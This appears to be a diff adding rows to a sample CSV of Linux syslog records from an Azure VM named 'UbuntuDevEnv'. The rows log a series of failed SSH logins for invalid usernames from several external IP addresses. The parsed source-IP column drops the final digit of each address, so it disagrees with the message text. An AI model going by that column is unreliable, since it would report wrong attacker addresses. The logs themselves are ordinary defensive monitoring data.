+6741,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:34,UbuntuDevEnv,2019-06-26 17:05:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44778,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6742,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:35,UbuntuDevEnv,2019-06-26 17:05:34,auth,UbuntuDevEnv,info,Invalid user jacqueline from 81.0.212.18 port 38997,44783,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jacqueline,81.0.212.1,38997,,
+6743,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:35,UbuntuDevEnv,2019-06-26 17:05:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,44783,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+6744,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:35,UbuntuDevEnv,2019-06-26 17:05:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44783,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6745,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:36,UbuntuDevEnv,2019-06-26 17:05:35,auth,UbuntuDevEnv,info,Invalid user zabbix from 35.154.19.93 port 35644,44785,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zabbix,35.154.19.9,35644,,
+6746,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:36,UbuntuDevEnv,2019-06-26 17:05:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,44785,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6747,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:36,UbuntuDevEnv,2019-06-26 17:05:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44785,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6748,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:36,UbuntuDevEnv,2019-06-26 17:05:35,auth,UbuntuDevEnv,info,Failed password for invalid user testmail from 77.237.69.165 port 52915 ssh2,44778,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testmail,77.237.69.1,52915,,
+6749,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:36,UbuntuDevEnv,2019-06-26 17:05:36,auth,UbuntuDevEnv,info,Disconnected from invalid user testmail 77.237.69.165 port 52915 [preauth],44778,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testmail,77.237.69.1,52915,,
+6750,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:36,UbuntuDevEnv,2019-06-26 17:05:36,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 52915:11: Bye Bye [preauth],44778,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,52915,,
+6751,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:37,UbuntuDevEnv,2019-06-26 17:05:37,auth,UbuntuDevEnv,info,Failed password for invalid user jacqueline from 81.0.212.18 port 38997 ssh2,44783,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jacqueline,81.0.212.1,38997,,
+6752,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:37,UbuntuDevEnv,2019-06-26 17:05:37,auth,UbuntuDevEnv,info,Disconnected from invalid user jacqueline 81.0.212.18 port 38997 [preauth],44783,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jacqueline,81.0.212.1,38997,,
+6753,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:37,UbuntuDevEnv,2019-06-26 17:05:37,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 38997:11: Bye Bye [preauth],44783,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,38997,,
+6754,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:38,UbuntuDevEnv,2019-06-26 17:05:38,auth,UbuntuDevEnv,info,Failed password for invalid user zabbix from 35.154.19.93 port 35644 ssh2,44785,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zabbix,35.154.19.9,35644,,
+6755,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:38,UbuntuDevEnv,2019-06-26 17:05:38,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 35644:11: Normal Shutdown, Thank you for playing [preauth]",44785,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,35644,,
+6756,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:38,UbuntuDevEnv,2019-06-26 17:05:38,auth,UbuntuDevEnv,info,Disconnected from invalid user zabbix 35.154.19.93 port 35644 [preauth],44785,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zabbix,35.154.19.9,35644,,
+6757,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:43,UbuntuDevEnv,2019-06-26 17:05:43,auth,UbuntuDevEnv,info,Invalid user deploy from 35.154.19.93 port 38918,44815,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,35.154.19.9,38918,,
+6758,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:43,UbuntuDevEnv,2019-06-26 17:05:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,44815,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6759,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:43,UbuntuDevEnv,2019-06-26 17:05:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44815,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6760,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:45,UbuntuDevEnv,2019-06-26 17:05:44,auth,UbuntuDevEnv,info,Failed password for invalid user deploy from 35.154.19.93 port 38918 ssh2,44815,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,35.154.19.9,38918,,
+6761,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:45,UbuntuDevEnv,2019-06-26 17:05:45,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 38918:11: Normal Shutdown, Thank you for playing [preauth]",44815,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,38918,,
+6762,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:45,UbuntuDevEnv,2019-06-26 17:05:45,auth,UbuntuDevEnv,info,Disconnected from invalid user deploy 35.154.19.93 port 38918 [preauth],44815,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,35.154.19.9,38918,,
+6763,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:06:03,UbuntuDevEnv,2019-06-26 17:06:02,auth,UbuntuDevEnv,info,Invalid user deploy from 35.154.19.93 port 42192,44879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,35.154.19.9,42192,,
+6764,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:06:03,UbuntuDevEnv,2019-06-26 17:06:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6765,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:06:03,UbuntuDevEnv,2019-06-26 17:06:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,44879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6766,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:06:05,UbuntuDevEnv,2019-06-26 17:06:05,auth,UbuntuDevEnv,info,Failed password for invalid user deploy from 35.154.19.93 port 42192 ssh2,44879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,35.154.19.9,42192,,
+6767,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:06:05,UbuntuDevEnv,2019-06-26 17:06:05,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 42192:11: Normal Shutdown, Thank you for playing [preauth]",44879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,42192,,
+6768,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:06:05,UbuntuDevEnv,2019-06-26 17:06:05,auth,UbuntuDevEnv,info,Disconnected from invalid user deploy 35.154.19.93 port 42192 [preauth],44879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,35.154.19.9,42192,,
+6769,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:06:34,UbuntuDevEnv,2019-06-26 17:06:33,auth,UbuntuDevEnv,info,Invalid user jira from 35.154.19.93 port 45494,44997,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jira,35.154.19.9,45494,,
+6770,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:06:34,UbuntuDevEnv,2019-06-26 17:06:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,44997,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6771,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:06:34,UbuntuDevEnv,2019-06-26 17:06:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44997,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6772,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:06:35,UbuntuDevEnv,2019-06-26 17:06:35,auth,UbuntuDevEnv,info,Failed password for invalid user jira from 35.154.19.93 port 45494 ssh2,44997,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jira,35.154.19.9,45494,,
+6773,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:06:35,UbuntuDevEnv,2019-06-26 17:06:35,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 45494:11: Normal Shutdown, Thank you for playing [preauth]",44997,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,45494,,
+6774,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:06:35,UbuntuDevEnv,2019-06-26 17:06:35,auth,UbuntuDevEnv,info,Disconnected from invalid user jira 35.154.19.93 port 45494 [preauth],44997,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jira,35.154.19.9,45494,,
+6775,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:06:39,UbuntuDevEnv,2019-06-26 17:06:39,auth,UbuntuDevEnv,info,Invalid user cw from 74.94.246.82 port 58838,45022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cw,74.94.246.8,58838,,
+6776,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:06:39,UbuntuDevEnv,2019-06-26 17:06:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6777,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:06:39,UbuntuDevEnv,2019-06-26 17:06:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,45022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+6778,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:06:41,UbuntuDevEnv,2019-06-26 17:06:41,auth,UbuntuDevEnv,info,Failed password for invalid user cw from 74.94.246.82 port 58838 ssh2,45022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cw,74.94.246.8,58838,,
+6779,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:06:41,UbuntuDevEnv,2019-06-26 17:06:41,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 58838:11: Bye Bye [preauth],45022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,58838,,
+6780,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:06:41,UbuntuDevEnv,2019-06-26 17:06:41,auth,UbuntuDevEnv,info,Disconnected from invalid user cw 74.94.246.82 port 58838 [preauth],45022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cw,74.94.246.8,58838,,
+6781,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:00,UbuntuDevEnv,2019-06-26 17:07:00,auth,UbuntuDevEnv,info,Invalid user english from 77.237.69.165 port 60102,45093,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,english,77.237.69.1,60102,,
+6782,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:00,UbuntuDevEnv,2019-06-26 17:07:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,45093,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+6783,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:00,UbuntuDevEnv,2019-06-26 17:07:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45093,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6784,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:02,UbuntuDevEnv,2019-06-26 17:07:02,auth,UbuntuDevEnv,info,Failed password for invalid user english from 77.237.69.165 port 60102 ssh2,45093,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,english,77.237.69.1,60102,,
+6785,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:02,UbuntuDevEnv,2019-06-26 17:07:02,auth,UbuntuDevEnv,info,Disconnected from invalid user english 77.237.69.165 port 60102 [preauth],45093,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,english,77.237.69.1,60102,,
+6786,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:02,UbuntuDevEnv,2019-06-26 17:07:02,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 60102:11: Bye Bye [preauth],45093,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,60102,,
+6787,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:06,UbuntuDevEnv,2019-06-26 17:07:05,auth,UbuntuDevEnv,info,Invalid user ved from 81.0.212.18 port 48286,45117,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ved,81.0.212.1,48286,,
+6788,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:06,UbuntuDevEnv,2019-06-26 17:07:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45117,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6789,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:06,UbuntuDevEnv,2019-06-26 17:07:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,45117,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+6790,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:06,UbuntuDevEnv,2019-06-26 17:07:05,auth,UbuntuDevEnv,info,Invalid user jira from 35.154.19.93 port 48790,45114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jira,35.154.19.9,48790,,
+6791,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:06,UbuntuDevEnv,2019-06-26 17:07:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6792,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:06,UbuntuDevEnv,2019-06-26 17:07:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,45114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6793,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:08,UbuntuDevEnv,2019-06-26 17:07:08,auth,UbuntuDevEnv,info,Failed password for invalid user ved from 81.0.212.18 port 48286 ssh2,45117,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ved,81.0.212.1,48286,,
+6794,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:08,UbuntuDevEnv,2019-06-26 17:07:08,auth,UbuntuDevEnv,info,Disconnected from invalid user ved 81.0.212.18 port 48286 [preauth],45117,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ved,81.0.212.1,48286,,
+6795,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:08,UbuntuDevEnv,2019-06-26 17:07:08,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 48286:11: Bye Bye [preauth],45117,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,48286,,
+6796,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:08,UbuntuDevEnv,2019-06-26 17:07:08,auth,UbuntuDevEnv,info,Failed password for invalid user jira from 35.154.19.93 port 48790 ssh2,45114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jira,35.154.19.9,48790,,
+6797,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:08,UbuntuDevEnv,2019-06-26 17:07:08,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 48790:11: Normal Shutdown, Thank you for playing [preauth]",45114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,48790,,
+6798,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:08,UbuntuDevEnv,2019-06-26 17:07:08,auth,UbuntuDevEnv,info,Disconnected from invalid user jira 35.154.19.93 port 48790 [preauth],45114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jira,35.154.19.9,48790,,
+6799,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:39,UbuntuDevEnv,2019-06-26 17:07:39,auth,UbuntuDevEnv,info,Invalid user db2fenc1 from 35.154.19.93 port 52086,45233,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,db2fenc1,35.154.19.9,52086,,
+6800,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:39,UbuntuDevEnv,2019-06-26 17:07:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45233,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
